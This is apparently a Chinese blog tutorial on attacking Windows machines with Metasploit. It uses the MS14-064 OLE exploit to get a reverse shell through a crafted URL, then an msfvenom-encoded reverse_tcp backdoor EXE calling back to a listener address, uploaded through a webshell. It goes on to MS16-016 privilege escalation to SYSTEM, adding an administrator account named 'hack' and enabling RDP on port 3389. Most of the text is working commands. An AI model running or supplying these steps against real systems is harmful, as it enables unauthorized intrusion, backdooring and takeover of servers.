开始渗透
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术.
远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本.
metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution
执行命令:
msfconsole //启动MSF
search ms14 //搜索关键字
use exploit/windows/browser/ms14_064_ole_code_execution // 加载漏洞利用模块
set payload windows/meterpreter/reverse_tcp //设置反弹连接shell
如图:
需要注意的是箭头标记的属性默认为false 需要设置为true ,因为msf中自带的漏洞利用exp调用的是 powershell.
所以msf(Metasploit Framework)中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell,所以这里测试受害的机器为windows7 32位.
按照图中各个属性配置好后 执行:
exploit
即可 .
到一个URL地址,复制到受害者机器(win7)测试
当用户点击允许了后,可以看见这边反弹了一个shell, 测试成功。
用MSF进行提权
在WEB渗透中拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的!先用msfvenom生成一个EXE的木马后门:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe
然后在到MSF根据刚才配置的木马后门进行监听,然后在把木马上传到服务器(受害者)的机器里,必须上传到可读可写的目录下.
这里我把abc.exe上传到了C:usersleakdesktop目录下,abc.exe就是刚才生成的后门.
然后在执行的后门,可以看见MSF弹回了一个session 1(会话连接).说明后门程序成功执行起来了,当然你也可以在webshell执行的,但必须的有一点执行的权限.
getuid //可以看见权限很低,一般都是user权限的,但也遇到过某些服务器执行后就直接是system最高权限.像这种就直接加用户.
这里是user权限,我们要把它提升到system权限,Windows最高权限。
接着输入命令 :
background //把你当前的metasploit shell转为后台执行。
search ms16 // 搜索关键字相关的漏洞
然后我选择了MS16-016这个漏洞在进行提权 :
use exploit/windows/local/ms16_016_webdav // 选择漏洞
show options //查看漏洞里边要设置的参数
可以看见只有一个SESSION参数要设置 :
set SESSION 1 // 设置会刚才我们后门连接的ID号 1
可以看见成功的吧漏洞利用到了PID为692的进程中,虽然提权成功了 但你getuid下还是看见的是user权限:
ps一下查看进程
根据刚才的提示找到PID 692的进程,可以看见确实是system权限.
所以还要用到migrate 命令 //迁移到一个指定的进程ID.
migrate 692 //
在getuid下可以看见为system权限 .
既然有了system权限 那我们在添加账号hack,添加为管理员组
用Nmap扫下并没有开启远程登陆3389 .
run getgui -e //开启目标主机3389
貌似这条MSF命令只对2003的系统有效 执行几次都没成功 , 所以就用cmd命令开了3389端口 .
提权成功,登录服务器 .
暂无评论内容